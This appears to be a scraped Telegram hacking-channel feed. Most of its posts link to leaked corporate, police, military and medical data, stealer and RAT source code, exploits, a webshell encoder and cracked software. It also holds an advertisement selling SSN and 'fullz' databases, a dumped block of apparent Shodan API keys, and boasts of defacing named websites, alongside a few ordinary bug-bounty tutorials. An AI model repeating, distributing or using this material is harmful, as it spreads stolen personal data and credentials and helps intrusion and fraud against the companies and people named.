🧮📌Ekohesap Information Technologies Inc Turkey Leak : https://system32.ink/ekohesap-information-technologies-inc-turkey-leak/📍📍NetRadar : https://system32.ink/netradar/🖨🪅Granada Energy Corporation Data Leak : https://system32.ink/granada-energy-corporation-data-leak/📟📌Ad-Link-Bypasser-Bot : https://system32.ink/ad-link-bypasser-bot/ 📟🧮TBBRAT – Power Full BotNet : https://system32.ink/tbbrat-power-full-botnet/ 🪅📍Cortex XSOAR 6.11 Enterprise : https://system32.ink/cortex-xsoar-6.11-enterprise/@Crackcodes | System32.ink | Crackcodes.in
2023-08-12 05:37:46
https://t.me/kernel64bit
2023-08-12 04:27:34
🔰☣️VED-eBPF - Kernel Exploit and Rootkit Detection : https://system32.ink/ved-ebpf-kernel-exploit-and-rootkit-detection/👾⚡Bashfuscator : https://system32.ink/bashfuscator/🌪️CDEK Company Data Leak : https://system32.ink/cdek-company-data-leak/
2023-08-11 14:23:00
🔰⚡US Military Contractor And Puerto Rican Reserve Files Leak : https://system32.ink/us-military-contractor-and-puerto-rican-reserve-files-leak/👾💩Islamic Reminder Data Leak : https://system32.ink/islamic-reminder-data-leak/☣️🌪️Bangladeshi Police Files Leak : https://system32.ink/bangladeshi-police-files-leak/@Crackcodes | System32.ink | Crackcodes.in
2023-08-11 11:17:38
SHODAN keys OefcMxcunkm72Po71vVtX8zUN57vQtACPSKINdQe1GyxGgecYz2191H2JoS9qvgDpHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM61TvA2dNwxNxmWziZxKzR5aO9tFD00NjxTbXXOSBr0R65OcClImSwzadExoXU4tcEJV3A4Mka2wPs7P8VBCO6xcpRe27iNJumEuInz8UH1ixLGJq4oQhEiJORERVG5xclkY0ng0XMo29zEhzyw3ibQfeEBxghwPFsyeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kikdTNGRiwYNozXIDRf5DWyGNbkdiS5m3JKkdnzf4fsYWQmGajRDn3hB0RElbUlIaquboYedPn8iDWi6GDSO6h2kz72VLt6bZ3SFQNAMUdkeqXqVOdXsTLYeatFSpZSktdbOygcaGSSq46Lg5fZiADAuFxl4OBbn7zmXAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6nkGd8uVE4oryfUVvioprswdKGmA5InzZXYdjHDeJM36AjDfU1feBsyMJIj8XxGzDEBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5
2023-08-11 01:59:18
📌📍Jonas Photo Indonesia Leak : https://system32.ink/jonas-photo-indonesia-leak/📟Angkasa MALAYSIAN Data Leak : https://system32.ink/angkasa-malaysian-data-leak/👾👾Titan Stealer Source Code : https://system32.ink/titan-stealer-source-code/🖨Sudomy – Subdomain Enumeration & Analysis Tool : https://system32.ink/sudomy-subdomain-enumeration-analysis-tool/ 👾🖨Scan4All – Vuls Scanner 15000+PoCs : https://system32.ink/scan4all-vuls-scanner-15000pocs/🪅NgelistMoment – Domain Grabber : https://system32.ink/ngelistmoment-domain-grabber/🧮CVE-2023-30533 POC : https://system32.ink/cve-2023-30533-poc/@Crackcodes | System32.ink | Crackcodes.in
2023-08-10 14:56:58
https://system32.ink/titan-stealer-source-code/
2023-08-10 06:37:12
𝙐𝙣𝙞𝙘𝙤𝙙𝙚 𝙓𝙎𝙎 𝙋𝙖𝙮𝙡𝙤𝙖𝙙 ✨𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1689525340534976512?t=Na4-X1I4Ywcf0wZKXhEBdw&s=19
2023-08-10 05:29:32
https://www.amazon.in/Beelink-Versatile-Windows-Channel-Graphics/dp/B09K39RJDQ/ref=mp_s_a_1_5?crid=U028103NJSKU&keywords=beelink+mini+pc&qid=1691642228&sprefix=beelink+%2Caps%2C260&sr=8-5Have a look at this
2023-08-10 02:27:56
👾WordPress AN_Gradebook SQL Injection Exploit : https://system32.ink/wordpress-an_gradebook-sql-injection-exploit/🌚Billarnetshop Data Leak : https://system32.ink/billarnetshop-data-leak/📟httptoolkit-android : https://system32.ink/httptoolkit-android/
2023-08-09 17:32:53
🔰⚡TP-Link TL-WR840N Stack Buffer Overflow DoS POC : https://system32.ink/tp-link-tl-wr840n-stack-buffer-overflow-dos-poc/💥☣️Apple Safari Integer Overflow POC : https://system32.ink/apple-safari-integer-overflow-poc/💥🌪️AT&T 5 million Leak : https://system32.ink/att-5-million-leak/👾💥Tracker De Colombia Sas Leak : https://system32.ink/tracker-de-colombia-sas-leak/💥👾🔰Xray 1.9.11 Crack : https://system32.ink/xray-1.9.11-crack-download/@Crackcodes | System32.ink | Crackcodes.in
2023-08-09 04:48:32
𝘾𝙍𝙇𝙁 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝙤𝙣 𝙏𝙬𝙞𝙩𝙩𝙚𝙧 𝘼𝙙𝙨 😳𝘽𝙤𝙪𝙣𝙩𝙮: 𝟮𝟵𝟰𝟬 $ 🍻𝗟𝗶𝗻𝗸: https://youtu.be/G2aitJUsroY
2023-08-09 02:59:39
📌FortiCrack – Decrypt encrypted Fortienet FortiOS Firmware Images : https://system32.ink/forticrack-decrypt-encrypted-fortienet-fortios-firmware-images/📍Apt_t00ls-OA High-risk Vulnerability Detection Tool : https://system32.ink/apt_t00ls-oa-high-risk-vulnerability-detection-tool/📟APTRS – Automated Penetration Testing Reporting System : https://system32.ink/aptrs-automated-penetration-testing-reporting-system/👾Sinbad Club Data Leak : https://system32.ink/sinbad-club-data-leak/🧮DataSurgeon : https://system32.ink/datasurgeon/@Crackcodes | System32.ink | Crackcodes.in
2023-08-08 03:57:35
🔰💥AKORO Austrian Marketing Service Leak : https://system32.ink/akoro-austrian-marketing-service-leak/💩🌪️7ai.tv Chinese Porn Website Data Leak : https://system32.ink/7ai.tv-chinese-porn-website-data-leak/👾☣️PT SUCCESS Indonesian Payment Processor Data Leak : https://system32.ink/pt-success-indonesian-payment-processor-data-leak/
2023-08-07 16:11:50
😈🍹sector Database🍹😈😈 Sector always sector 😈😈Deep web dark web leaker😈😈 Phone number Database. 😈 Mail Database. 😈 Citizens Database. 😈 Passport Database. 😈 Consumer Database. 😈 France Database.😈 Belgium Database.😈 Italy Database.😈 Iran Database.😈 B2B Database. 😈 Germany Database.😈 Swiss Database.😈 Poland Database.😈 Vietnam Database.😈 Sweden Database.😈 Africa Database😈 Usa Database.😈 China database 😈 Spain Database.😈 Sweden Database.😈 Greece Database.😈 Netherland Database.😈 Colombia Database😈 Usa SSN + Fullz Database😈 484 Big COMPANY Database. 😈 Ukraine Database.😈 India Database😈 Bank database 😈 Unlimited logs private 😈 Australia, china, rassia, etc (golden nearly all countries database) Free data👇@private_sector_info
2023-08-07 05:28:33
𝙎𝙎𝙏𝙄 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝘼𝙩𝙩𝙖𝙘𝙠 💉𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭.What is Template Engines𝟮. Different Types of Template Engines𝟯. What is SSTI ? 𝟰. Exploiting SSTI Vulnerability. 𝗡𝗢𝗧𝗘: SSTI Payloads are given in Description. Please Share your Views 🙏☺𝗟𝗶𝗻𝗸: https://youtu.be/4y2Vrh1SCeY
2023-08-07 02:17:09
🧮📌Cafe Britt Data Leak : https://system32.ink/cafe-britt-data-leak/📍🪅Judicial Yuan Data Leak : https://system32.ink/judicial-yuan-data-leak/👾Exeinfo Pe v0.8.0 (VIP) : https://system32.ink/exeinfo-pe-v0.8.0-vip-free-download/ 🤖👾RogueSliver – C2 Framework : https://system32.ink/roguesliver-c2-framework/ 🌚Privacy.sexy — Now You Have The Choice : https://system32.ink/privacy.sexy-now-you-have-the-choice/@Crackcodes | System32.ink | Crackcodes.in
2023-08-06 13:51:39
📌📍Craxs Rat v5.1 + Loader : https://system32.ink/craxs-rat-v5.1-loader/📟Empirical Research Data Leak : https://system32.ink/empirical-research-data-leak/🧮NATO Leak : https://system32.ink/nato-leak/🪅Blind SQL Injection Tool - Bisection Method To Dump Datas : https://system32.ink/blind-sql-injection-bisection-method-to-dump-datas/
2023-08-06 10:04:49
Malbolge
2023-08-06 07:23:15
🔰⚡Syn Pain Management and Spine Specialists Treats Clinic Data Leak : https://system32.ink/syn-pain-management-and-spine-specialists-treats-clinic-data-leak/👾☣️SQL Injection URL Scraper : https://system32.ink/sql-injection-url-scraper/👾☣️0xPayload : https://system32.ink/0xpayload/
2023-08-05 15:44:18
CrackCodes 🇮🇳 pinned «🧮📌Ekohesap Information Technologies Inc Turkey Leak : https://system32.ink/ekohesap-information-technologies-inc-turkey-leak/ 📍📍NetRadar : https://system32.ink/netradar/ 🖨🪅Granada Energy Corporation Data Leak : https://system32.ink/granada-energy-corporation…»
2023-08-05 12:44:15
None
2023-08-05 11:10:18
🧮📌Ekohesap Information Technologies Inc Turkey Leak : https://system32.ink/ekohesap-information-technologies-inc-turkey-leak/📍📍NetRadar : https://system32.ink/netradar/🖨🪅Granada Energy Corporation Data Leak : https://system32.ink/granada-energy-corporation-data-leak/📟📌Ad-Link-Bypasser-Bot : https://system32.ink/ad-link-bypasser-bot/ 📟🧮TBBRAT – Power Full BotNet : https://system32.ink/tbbrat-power-full-botnet/ 🪅📍Cortex XSOAR 6.11 Enterprise : https://system32.ink/cortex-xsoar-6.11-enterprise/@Crackcodes | System32.ink | Crackcodes.in
2023-08-04 14:47:35
CrackCodes 🇮🇳 pinned «📌📍Craxs Rat v5.1 + Loader : https://system32.ink/craxs-rat-v5.1-loader/ 📟Empirical Research Data Leak : https://system32.ink/empirical-research-data-leak/ 🧮NATO Leak : https://system32.ink/nato-leak/ 🪅Blind SQL Injection Tool - Bisection Method To Dump…»
2023-08-04 02:06:11
📌📍Craxs Rat v5.1 + Loader : https://system32.ink/craxs-rat-v5.1-loader/📟Empirical Research Data Leak : https://system32.ink/empirical-research-data-leak/🧮NATO Leak : https://system32.ink/nato-leak/🪅Blind SQL Injection Tool - Bisection Method To Dump Datas : https://system32.ink/blind-sql-injection-bisection-method-to-dump-datas/
2023-08-03 11:33:06
SO THIS IS YOUR SURPRISE WHICH ME AND MY TEAM ARE WORKING ON . IT'S ALMOST COMPLETE JUST ADDING COURSES IN IT NOW..SOON THIS BOT IN YOUR HANDS..TEAM CDI ❤️JAY SHREE RAAM❤️
2023-08-03 10:32:14
📌📟CVE-2023-37979 Ninja-Forms Exploit : https://system32.ink/cve-2023-37979-ninja-forms-exploit/🧮LFI FINDER TOOL : https://system32.ink/lfi-finder-tool/📍🪅Gamigo Data Leak : https://system32.ink/gamigo-data-leak/@Crackcodes | System32.ink | Crackcodes.in
2023-08-03 07:41:31
Add this Regex in your Burpsuite to Filter out Potential Parameters. 🔥𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1687004260846968832?t=B24H82qV0Iu4R500qLza7w&s=19
2023-08-03 02:26:17
🔰⚡US Military Contractor And Puerto Rican Reserve Files Leak : https://system32.ink/us-military-contractor-and-puerto-rican-reserve-files-leak/👾💩Islamic Reminder Data Leak : https://system32.ink/islamic-reminder-data-leak/☣️🌪️Bangladeshi Police Files Leak : https://system32.ink/bangladeshi-police-files-leak/@Crackcodes | System32.ink | Crackcodes.in
2023-08-02 14:28:19
📍📌AdventNet ManageEngine ADAudit Plus : https://system32.ink/adventnet-manageengine-adaudit-plus/📟🧮Bank Commonwealth Leak : https://system32.ink/bank-commonwealth-leak/🪅📌xorshell – Encoder PHP webshell to bypass WAF : https://system32.ink/xorshell-encoder-php-webshell-to-bypass-waf/@Crackcodes | System32.ink | Crackcodes.in
2023-08-02 12:24:47
https://twitter.com/osintambitionFollow us guys for amazing posts on OSINT.
2023-08-02 08:25:55
1120 $ 𝘽𝙤𝙪𝙣𝙩𝙮 𝙤𝙣𝙡𝙮 𝙛𝙤𝙧 𝘾𝙡𝙞𝙘𝙠𝙅𝙖𝙘𝙠𝙞𝙣𝙜 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮😨🔥It was reported in Twitter acquired domain. 𝙑𝙞𝙙𝙚𝙤 𝙋𝙤𝘾: https://youtu.be/PfUJ4xIT7Io
2023-08-01 13:12:31
📌📍Avatier Develops Software Data Leak : https://system32.ink/avatier-develops-software-data-leak/🧮ManageEngine Endpoint Central Enterprise : https://system32.ink/manageengine-endpoint-central-enterprise/🪅📟GulagScanner – CloudFlare DNS Bypass & Analyzer : https://system32.ink/gulagscanner-cloudflare-dns-bypass-analyzer/🖨Nesca 4 – Multi-Threaded Port Scanner : https://system32.ink/nesca-4-multi-threaded-port-scanner/@Crackcodes | System32.ink | Crackcodes.in
2023-08-01 07:43:08
Deep web dark web database leaker join and enjoy @private_sector_info
2023-07-31 15:55:06
CrackCodes 🇮🇳 pinned «📌Xplain AG | Xplain.ch Data Leak : https://system32.ink/xplain-ag-xplain.ch-data-leak/ 📟CVE-2023-24489 Exploiter [ShareFile RCE] : https://system32.ink/cve-2023-24489-exploiter-sharefile-rce/ 🪅RealChar. – Your Realtime AI Character : https://system32.ink/realchar.…»
2023-07-31 15:25:55
25 HTB 1 Year Voucher Freehttps://hackthebox.com/v/7yf9iolmPr@n|<
2023-07-31 11:56:25
https://trickypenguin.ink/host-header-injection-unraveling-the-impact-of-host-header-injection/
2023-07-31 11:41:09
Hi, man.I'm also security expert specialize web/servers/reverse.So I have issue with patching bootloaders SoC......Becouse:*) This devices have no buttons for fastboot*) Every test image solution writing to the NAND via jtag (chip desoldering/rebolling)*) Not fully figured out how to run the bootloader in the Unicorn-Engine*) We have not runtime logs like i2c/uart debug*) Image have hw_boot(a/b) and boot(a/b). It's difficult for me *) Boot image have not ramdisc_____Probably solution (dirty mode)*) Inject in bootloader asm loop in other places to detect avb and ohers verification places and just patch via jmp*) Compile own bootloader via Das is U-BootSo. I will be glad if You advise maybe better solution.Welcome in my half-public as admin https://t.me/+RXUocGXlF6eVK23C
2023-07-31 11:28:41
📌Xplain AG | Xplain.ch Data Leak : https://system32.ink/xplain-ag-xplain.ch-data-leak/📟CVE-2023-24489 Exploiter [ShareFile RCE] : https://system32.ink/cve-2023-24489-exploiter-sharefile-rce/🪅RealChar. – Your Realtime AI Character : https://system32.ink/realchar.-your-realtime-ai-character/@Crackcodes | System32.ink | Crackcodes.in
2023-07-31 08:26:27
Awesome Browser Extensions for OSINT by @osintambition A collection of awesome browser extension useful for OSINT along with their use case.https://github.com/osintambition/Awesome-Browser-Extensions-for-OSINT#OSINT #SOCINT #Intelligence #OSINTforGood #opensourceIntelligence #Cybersec #infosec #Recon
2023-07-31 08:26:26
Best Tools Collection for Social Media OSINT (SOCINT)https://github.com/osintambition/Social-Media-OSINT-Tools-CollectionFollow @osintambition for more amazing content like this.#Cybersecurity #Infosec #OSINT #SOCINT #HUMINT #Cybercrimes #OnineInvestigations #socialMedia #facebook #Instagram #Linkedin #Github #Reddit
2023-07-31 06:21:45
OTP Bypasshttps://youtu.be/a7KyqrLMVxc
2023-07-31 05:06:12
Here it is 🔥Broken Access Control : 𝙋𝙖𝙧𝙩-2 𝙄𝘿𝙊𝙍 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮. 𝙏𝙤𝙥𝙞𝙘𝙨 𝘾𝙤𝙫𝙚𝙧𝙚𝙙:1. What is IDOR? 2. How to Find IDOR Vulnerability🤓3. What is NOT an IDOR issue 👀Please Share your Views 🙏🏻𝙇𝙞𝙣𝙠: https://youtu.be/GWeSV8MW4TE
2023-07-31 02:15:49
CrackCodes 🇮🇳 pinned «https://youtu.be/9iSWrotSouA»
2023-07-30 16:56:49
https://youtu.be/9iSWrotSouA
2023-07-30 10:50:10
If Someone Have Tryhackme premium Plz donate to @gamer_op_0 This Guy , he Wants for practice..
2023-07-30 08:51:41
🔰👾CVE-2023-35078 Exploit POC : https://system32.ink/cve-2023-35078-exploit-poc/⚡☣️One-liners for Bug Bounty : https://system32.ink/one-liners-for-bug-bounty/🌪️💥007-𝙏𝙝𝙚𝘽𝙤𝙣𝙙 Osint Tool : https://system32.ink/007-%f0%9d%99%8f%f0%9d%99%9d%f0%9d%99%9a%f0%9d%98%bd%f0%9d%99%a4%f0%9d%99%a3%f0%9d%99%99/⚡ALIENFOX FREE CHECKER : https://system32.ink/alienfox-free-checker/⭐⚡Nini Collection Ltd Jewelery Data Leak : https://system32.ink/nini-collection-ltd-data-leak/@Crackcodes | System32.ink | Crackcodes.in
2023-07-30 02:45:41
DOMAIN 🔥 SELL.COM.IN.XYZ.ORG.UK.DE.FR.US.CA.JP.WIKI.SBSCHEAPEST DOMAIN - .SBS ONLY 49/-DM @WR1CK
2023-07-29 13:57:17
🏥Health Springs Medical Center Data Leak : https://system32.ink/health-springs-medical-center-data-leak/📟LightSpeed – Fast Data Extraction Using Sqli : https://system32.ink/lightspeed-fast-data-extraction-using-sqli/🧮CVE-2023-33802 SumatraPDF 3.4.6 DoS : https://system32.ink/cve-2023-33802-sumatrapdf-3.4.6-dos/📌LaravelScraper : https://system32.ink/laravelscraper/@Crackcodes | System32.ink | Crackcodes.in
2023-07-29 12:22:38
https://www.instagram.com/reel/CvOsyzoN6Au/?igshid=MzRlODBiNWFlZA==𝘽𝙧𝙤𝙠𝙚𝙣 𝘼𝙘𝙘𝙚𝙨𝙨 𝘾𝙤𝙣𝙩𝙧𝙤𝙡 𝙍𝙚𝙚𝙡𝙨 🔥
2023-07-29 09:56:03
So We Don't Take Them Seriously 💩🇵🇰
2023-07-29 05:49:52
𝙍𝙚𝙢𝙞𝙣𝙙𝙚𝙧 ‼️Make sure you watch 𝘽𝙧𝙤𝙠𝙚𝙣 𝙖𝙘𝙘𝙚𝙨𝙨 𝘾𝙤𝙣𝙩𝙧𝙤𝙡 - 𝙋𝙖𝙧𝙩-1. 𝙋𝙖𝙧𝙩 -2 Will release on Monday🔥𝙇𝙞𝙣𝙠: https://youtu.be/vfCxtSFxLDQ
2023-07-28 15:15:08
📌Weee! – sayweee.com leak : https://system32.ink/weee-sayweee.com-leak/💋Elitemate.com Dating Site Leak : https://system32.ink/elitemate.com-dating-site-leak/📍KILLSHOT – A Penetration Testing Framework : https://system32.ink/killshot-a-penetration-testing-framework/🪅CVE-2023-29336 Exploit : https://system32.ink/cve-2023-29336-exploit/📌WSPCoerce – PoC to coerce authentication from Windows hosts using MS-WSP : https://system32.ink/wspcoerce-poc-to-coerce-authentication-from-windows-hosts-using-ms-wsp/@Crackcodes | System32.ink | Crackcodes.in
2023-07-28 11:55:23
https://tulipcity.com.pk/index.phpDeface by:- 👼@II_SUDO_II👼
2023-07-28 05:52:27
𝘽𝙧𝙤𝙠𝙚𝙣 𝘼𝙘𝙘𝙚𝙨𝙨 𝘾𝙤𝙣𝙩𝙧𝙤𝙡 - 𝙊𝙫𝙚𝙧𝙫𝙞𝙚𝙬 ✨𝙇𝙞𝙣𝙠: https://youtube.com/shorts/Nj0tQJ5u5MA?feature=share
2023-07-28 05:44:36
https://www.kyrascope.com/contact_indian_toy_reviewer/Deface By 👼@II_SUDO_II👼
2023-07-27 14:50:05
📌NINTU PROCUREMENT SOFTWARE Data Leak : https://system32.ink/nintu-procurement-software-data-leak/📍Malicious PDF Generator : https://system32.ink/malicious-pdf-generator/🪅CVE-2023-3390 Exploit : https://system32.ink/cve-2023-3390_lts_cos_mitigation-exploit/@Crackcodes | System32.ink | Crackcodes.in
2023-07-27 06:18:39
https://t.me/+-Usb7lffFttlZDk1https://t.me/+v23QX_EPHoNhN2E1CAN YOU GUYS COMPLETE 500 MEMBERS ON BOTH CHANNEL TODAY ? WE ARE SO CLOSE🤧
2023-07-27 04:55:51
𝙎𝙩𝙤𝙧𝙚𝙙 𝙓𝙎𝙎 𝙫𝙞𝙖 𝙄𝙢𝙖𝙜𝙚 𝙐𝙥𝙡𝙤𝙖𝙙 𝙞𝙣 𝙎𝙝𝙤𝙥𝙞𝙛𝙮 👜😍For more Bug Bounty Videos please like & Subscribe to our YouTube channel. 𝙇𝙞𝙣𝙠: https://youtu.be/vGYXQR5NMrI
2023-07-26 13:09:54
📌CVE-2023-20593 AMD Zen Processor Exploit : https://system32.ink/cve-2023-20593-amd-zen-processor-exploit/📌CVE-2023-35086 POC : https://system32.ink/cve-2023-35086-poc/📌Cisco SPA112 2-Port Phone Adapters RCE Exploit : https://system32.ink/cisco-spa112-2-port-phone-adapters-rce-exploit/📌Kernel Exploits Factory : https://system32.ink/kernel-exploits-factory/📌VenomRAT v6.0.3 : https://system32.ink/venomrat-v6.0.3-source-code/📌99 Cents Only Stores Data Leak : https://system32.ink/99-cents-only-stores-data-leak/📌Fiberlink 210 routers Os Injection Exploit : https://system32.ink/fiberlink-210-routers-os-injection-exploit-cve-2023-33617/@Crackcodes | System32.ink | Crackcodes.in
2023-07-26 06:08:07
GUYS PLEASE JOIN OUR BACKUP CHANNEL https://t.me/CDI_backupsSO IF CHANNEL WILL GET DELETED DUE TO COPYRIGHT WE CAN EASILY FORWARD ALL COURSES AND UPDATES THERE.
2023-07-26 05:05:42
𝙀𝙖𝙨𝙞𝙚𝙨𝙩 𝙄𝙣𝙛𝙤𝙧𝙢𝙖𝙩𝙞𝙤𝙣 𝙙𝙞𝙨𝙘𝙡𝙤𝙨𝙪𝙧𝙚 𝙊𝙣𝙚𝙡𝙞𝙣𝙚𝙧. ✨𝙔𝙤𝙪 𝙘𝙖𝙣 𝙖𝙘𝙘𝙚𝙨𝙨 𝙖𝙡𝙡 𝙊𝙣𝙚𝙡𝙞𝙣𝙚𝙧𝙨 𝙞𝙣 𝙤𝙪𝙧 𝙂𝙞𝙩𝙝𝙪𝙗 𝙍𝙚𝙥𝙤. 𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1684066193580388352?t=wHIqw0lMfUC-tOJNRWA0xg&s=19
2023-07-25 15:30:26
🔰⚡TP-Link TL-WR840N Stack Buffer Overflow DoS POC : https://system32.ink/tp-link-tl-wr840n-stack-buffer-overflow-dos-poc/💥☣️Apple Safari Integer Overflow POC : https://system32.ink/apple-safari-integer-overflow-poc/💥🌪️AT&T 5 million Leak : https://system32.ink/att-5-million-leak/👾💥Tracker De Colombia Sas Leak : https://system32.ink/tracker-de-colombia-sas-leak/💥👾🔰Xray 1.9.11 Crack : https://system32.ink/xray-1.9.11-crack-download/@Crackcodes | System32.ink | Crackcodes.in
2023-07-25 11:56:41
None
2023-07-25 08:27:43
𝘽𝙧𝙚𝙖𝙠𝙞𝙣𝙜 𝙉𝙚𝙬𝙨 ‼️‼️𝙒𝙝𝙖𝙩𝙨𝘼𝙥𝙥 𝘼𝙘𝙘𝙤𝙪𝙣𝙩 𝙘𝙖𝙣 𝙗𝙚 𝙙𝙚𝙖𝙘𝙩𝙞𝙫𝙖𝙩𝙚𝙙 𝙗𝙮 𝙟𝙪𝙨𝙩 𝙨𝙚𝙣𝙙𝙞𝙣𝙜 𝙖𝙣 𝙀𝙢𝙖𝙞𝙡 😨😱... 📧𝙇𝙞𝙣𝙠: https://youtube.com/shorts/hilpMxU__GY?feature=share𝘾𝙝𝙚𝙘𝙠 𝙩𝙝𝙞𝙨 𝙊𝙪𝙩
2023-07-24 13:12:38
Pak courses 🇵🇰😂Note:- Aaj hi enroll ho jana
2023-07-24 05:30:43
⭕NO POLLS !! THERE'S A CLASS TODAY ⭕TOPIC - FOOTPRINTING AND RECON ⭕DIFFICULTY - ABSOLUTE BEGINNERS⭕HOST - @CYBERDIN ⭕TIME - 7:30 PM ⭕PLATFORM - TELEGRAM VOICE CALL AT @CYBERDIN1 DISCUSSION GROUP#hacker_bano_chutiya_nahi
2023-07-24 05:14:14
𝘽𝙧𝙤𝙠𝙚𝙣 𝘼𝙘𝙘𝙚𝙨𝙨 𝘾𝙤𝙣𝙩𝙧𝙤𝙡 - 𝙋𝙖𝙧𝙩 1 ➡️ 𝙋𝙧𝙞𝙫𝙞𝙡𝙚𝙜𝙚 𝙀𝙨𝙘𝙖𝙡𝙖𝙩𝙞𝙤𝙣🔥𝙏𝙤𝙥𝙞𝙘𝙨 𝘾𝙤𝙫𝙚𝙧𝙚𝙙:1. What is Access Control2. What is Broken Control3. Types of Privilege Escalation. 😨4. Practically Showcasing Privilege Escalation. Please Share your Views 🙏🏻. ‼️ 𝙀𝙣𝙙 𝙤𝙛 𝙩𝙝𝙚 𝙫𝙞𝙙𝙚𝙤 𝙄'𝙫𝙚 𝙂𝙞𝙫𝙚𝙣 𝙏𝙞𝙥𝙨 𝙃𝙤𝙬 𝙩𝙤 𝙁𝙞𝙣𝙙 𝙩𝙝𝙚𝙨𝙚 𝙩𝙮𝙥𝙚𝙨 𝙤𝙛 𝘽𝙪𝙜𝙨 ‼️𝙇𝙞𝙣𝙠: https://youtu.be/vfCxtSFxLDQ
2023-07-24 03:44:08
-> List of Websites Giving free RDP/VPS01) http://vpswala.org/02) http://ohosti.com/vpshosting.php03) https://gratisvps.net/04) https://my.letscloud.io/sign-up/05) https://developer.rackspace.com/06) https://www.vultr.com/07) https://www.ionos.com/08) https://www.cloudsigma.com/09) https://www.digitalocean.com/10) http://ezywatch.com/freevps/11) https://yellowcircle.net/12) https://www.ctl.io/free-trial/13) https://www.ihor.ru/14) https://www.neuprime.com/15) https://www.skysilk.com/16) https://sadd.io/17) https://www.apponfly.com/en[$] Feedback ~ @CW_ChatBot[$] Join ~ @CyberWallNetwork
2023-07-24 03:44:07
-> 16 FREE HOSTING PROVIDERS IN 20231. https://000webhost.com2. https://Freehostia.com3. https://Jimdo.com4. https://FreeHosting.com5. https://xtreemhost.com6. https://Zymic.com7. https://Byethost.com8. https://110MB.com9. https://AwardSpace.com10. https://1FreeHosting.com11. https://FreeHostingEU.com12. https://Uhostfull.com13. https://50Webs.com14. https://ZettaHost.com15. https://x10hosting.com16. https://Releifhost.com[$] Join ~ @CyberWallNetwork
2023-07-23 18:01:07
Bug Bounty tool Listdnscan https://github.com/rbsec/dnscanKnockpy https://github.com/guelfoweb/knockSublist3r https://github.com/aboul3la/Sublist3rmassdns https://github.com/blechschmidt/massdnsNmap https://nmap.orgMasscan https://github.com/robertdavidgraham/masscanEyeWitness https://github.com/ChrisTruncer/EyeWitnessDirBuster https://sourceforge.net/projects/dirbuster/dirsearch https://github.com/maurosoria/dirsearchGitrob https://github.com/michenriksen/gitrobgit-secrets https://github.com/awslabs/git-secretssandcastle https://github.com/yasinS/sandcastlebucket_finder https://digi.ninja/projects/bucket_finder.phpGoogD0rker https://github.com/ZephrFish/GoogD0rker/Wayback Machine https://web.archive.orgwaybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050Sn1per https://github.com/1N3/Sn1per/XRay https://github.com/evilsocket/xraywfuzz https://github.com/xmendez/wfuzz/patator https://github.com/lanjelot/patatordatasploit https://github.com/DataSploit/datasploithydra https://github.com/vanhauser-thc/thc-hydrachangeme https://github.com/ztgrace/changemeMobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/Apktool https://github.com/iBotPeaches/Apktooldex2jar https://sourceforge.net/projects/dex2jar/sqlmap http://sqlmap.org/…https://osint.website/2023/07/bug-bounty-tool-list/#BugBounty #Osint
2023-07-23 14:31:39
👾🍺Windows11 Exploits : https://system32.ink/windows11-exploits/💩💥TCL Chinese Theatres Data Leak : https://system32.ink/tcl-chinese-theatres-data-leak/⭐🔰Chrome CVE-2023-2033 PoC : https://system32.ink/chrome-cve-2023-2033-poc/👾💥⚡Cloudpanel 0-day Exploit : https://system32.ink/cloudpanel-0-day-exploit-cve-2023-35885/☣️⚡WooCommerce Payments: Unauthorized Admin Access Exploit : https://system32.ink/woocommerce-payments-unauthorized-admin-access-exploit-cve-2023-28121/@Crackcodes | System32.ink | Crackcodes.in
2023-07-23 10:18:46
https://youtu.be/iBZhWSxu2fg500+ Views 🫣✨Watch Now ‼️
2023-07-22 13:30:16
👾🍺Windows11 Exploits : https://system32.ink/windows11-exploits/💩💥TCL Chinese Theatres Data Leak : https://system32.ink/tcl-chinese-theatres-data-leak/⭐🔰Chrome CVE-2023-2033 PoC : https://system32.ink/chrome-cve-2023-2033-poc/👾💥⚡Cloudpanel 0-day Exploit : https://system32.ink/cloudpanel-0-day-exploit-cve-2023-35885/☣️⚡WooCommerce Payments: Unauthorized Admin Access Exploit : https://system32.ink/woocommerce-payments-unauthorized-admin-access-exploit-cve-2023-28121/@Crackcodes | System32.ink | Crackcodes.in
2023-07-22 08:23:25
CYBER DEMONS INDIA (CDI) COMMUNITY 🚩👉🏻 CODING RESOURCES 👉🏻 CDI CYBER SEC RESOURCES CHANNEL 👉🏻 CDI DISCUSSION GROUP👉🏻 CDI HANDWRITTEN NOTES CHANNEL👉🏻 CDI CYBER SEC BOOKS LIBRARY CHANNELJOIN IF YOU GUYS WANT TO STAY UPDATED TO CYBER SECURITY COURSES , HANDWRITTEN NOTES , CYBER SEC BOOKS , ROADMAPS , GITHUB REPOS , FUNNY OR TECH DISCUSSIONS , TECH SAVY PEOPLE , CLASSES , BLOGS AND CODING RESOURCES NOTEONLY SERIOUS PEOPLE JOIN THIS GROUP AND NO DISCUSSION ABOUT INSTAGRAM HACKING OR ANY KIND OF STUFF LIKE THIS .TYPE /notes FOR RESOURCES 🥰 JAY SHREE RAAM 🥰
2023-07-22 04:05:35
Ram ram 🙏
2023-07-21 14:28:06
